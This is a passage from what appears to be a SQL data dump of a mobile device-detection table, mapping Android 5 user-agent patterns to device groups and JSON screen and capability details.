Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-N910H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-N910T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-N920C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-N920G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-P600) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-P605) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-P905) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-T280) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-T285) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-T285M) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-T335) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-T530) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-T531) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-T533) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-T535) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-T555) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-T800) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SPH-L720) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SGH-I337) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SGH-I537) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-G530A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-G530AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-G750A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-G850A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-G870A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-G890A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-G900A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-G920A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-G925A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-G928A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-N900A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-N910A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-N915A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-N920A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-T337A) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-T537A) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG-SM-T807A) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SC-01F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SC-01H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SC-02F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SC-05G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SCH-I545) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SCH-R970) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SCL-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SCL-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SCL-TL00H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SCL22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SCL23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SCV31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SELFY 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SENSEIT E400) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SG503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SGH-I337M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SGH-M919V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SGP321) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SH-01G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SH-01J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SH-04F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SH-04G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SH-RM02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SHIFT4.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SHIFT5.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SHIFT5.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SHIFT5.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SHIFT5_3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SHL25) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SHV-E300K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SHV-E300L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SHV-E330K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SHV-E330L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SHV-E330S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SHV32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SHV33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SKY 5.0W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SLADE_X55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A3000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A300F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A300FU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A300G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A300H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A300M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SM-A300YZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 